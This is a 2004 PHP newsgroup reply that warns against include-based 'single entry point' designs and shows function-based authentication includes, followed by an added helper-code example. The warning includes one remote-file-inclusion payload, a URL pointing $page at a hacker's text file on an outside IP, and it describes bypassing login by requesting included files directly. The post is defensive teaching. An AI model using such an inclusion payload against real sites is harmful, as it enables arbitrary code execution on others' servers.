Re: Design Model Question
From: Chung Leong (chernyshevsky_at_hotmail.com)
Date: 06/26/04
- Next message: Garp: "Re: Any girls?"
- Previous message: Geoff Berrow: "Re: Any girls?"
- In reply to: Mike Sutton: "Design Model Question"
- Next in thread: Tony Marston: "Re: Design Model Question"
- Reply: Tony Marston: "Re: Design Model Question"
- Reply: Mike Sutton: "Re: Design Model Question"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Date: Fri, 25 Jun 2004 19:44:20 -0400
"Mike Sutton" <sutton128@yahoo.com> wrote in message
news:7eb017e9.0406251338.35a2900d@posting.google.com...
>
> The questions are:
> Can anyone provide opinions on advantages/disadvantages to each of
> these models?
> Can anyone provide the correct terminology to discuss these ideas so
> that I can look for more, relevant resources.
I was just talking about this in another thread. DON'T USE THE SINGLE ENTRY
POINT ARCHITECTURE! It offers no advantages at all, while its disadvantages
are numerous. First and foremost, this architecture is one of the leading
causes of security breaches in PHP sites. By setting $page to an Internet
address (http://www.example.net/page=http://128.34.123.34/hack.txt), I can
run arbitrary code on your server. And I can bypass your authentication
scheme by simply typing in the address to the file that you're including
(http://www.example.net/AccountIndex.php).
People who use this kind of scheme, I dare say, don't have a strong
programming background. Those who have programmed in C/C++ or other
procedural languages know that you include a file to make additional
functionalities available, not to cause something to occur. Think about it:
when you use require() you're just stating that the file is needed by the
current script.
The proper way to share code between scripts is to enclose it in functions,
keep these in a separate file, include it where it's needed, then call the
functions. Or, for the sake of convenience, just include it in every script.
Here's an example setup: We have a file called global.php that's included into
every script. This file, in turn, includes files with commonly used
functions.
global.php:
<?php
session_start();                  // needed before $_SESSION is read in RestrictAccess()
require("../inc/auth.php");
require("../inc/interface.php");
require("../inc/db.php");
// ... further includes
//error_reporting(E_ALL);
define("DEBUG", false);           // constant name must be passed as a string
?>
accountIndex.php:
<?php
require("global.php");
RestrictAccess();                 // redirects to login.php unless $_SESSION["logged_5"] is set
PrintHeader("Accounting");
PrintFooter();
?>
inc/auth.php
<?php
function RestrictAccess($level = 5) {
    if (empty($_SESSION["logged_$level"])) {
        // Redirect() is assumed to be defined in one of the other includes (e.g. interface.php)
        Redirect("login.php?level=$level");
        exit;                     // stop here even if Redirect() does not end the script itself
    }
}
?>
In this system, it's easy to have pages that require the user to log in and
others that do not. If you don't call RestrictAccess() then there's no
restriction. And it's easy to implement multi-level security. Just pass a
value to the function instead of employing the default if the page needs
extra security.
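As an added example (not code from Chung's post), here is one way to fill in the helpers the post relies on but does not show: a Redirect() that ends the request so the protected page body is never sent after the Location header, and a login-side GrantAccess() that sets the per-level session flags RestrictAccess() checks. Redirect(), GrantAccess(), HasAccess() and the cumulative level scheme are assumptions.

```php
<?php
// Added example, not from the original post. Assumes global.php has already
// called session_start(). Function names and the level scheme are assumptions.

// Ends the request. Without exit, PHP keeps executing the calling script and
// still sends the protected page body after the Location header.
function Redirect($url) {
    header("Location: $url");
    exit;
}

// Pure check, kept separate from the redirect so it can be unit-tested
// against a constructed session array.
function HasAccess(array $session, $level) {
    return !empty($session["logged_$level"]);
}

// Same contract as the post's RestrictAccess(): no call, no restriction;
// pass a higher level for pages that need extra security.
function RestrictAccess($level = 5) {
    if (!HasAccess($_SESSION, $level)) {
        Redirect("login.php?level=$level");
    }
}

// Called by login.php once the credentials check has succeeded. Assumed
// cumulative scheme: a user granted level N gets logged_1 .. logged_N, so a
// page calling RestrictAccess(3) admits level-3 and level-5 users but not a
// level-2 user.
function GrantAccess($level) {
    session_regenerate_id(true);    // fresh session id after authentication
    for ($i = 1; $i <= $level; $i++) {
        $_SESSION["logged_$i"] = true;
    }
}

// Constructed session for a level-3 user, to show the check in isolation:
$sample = array("logged_1" => true, "logged_2" => true, "logged_3" => true);
var_dump(HasAccess($sample, 3));    // bool(true)
var_dump(HasAccess($sample, 5));    // bool(false)
```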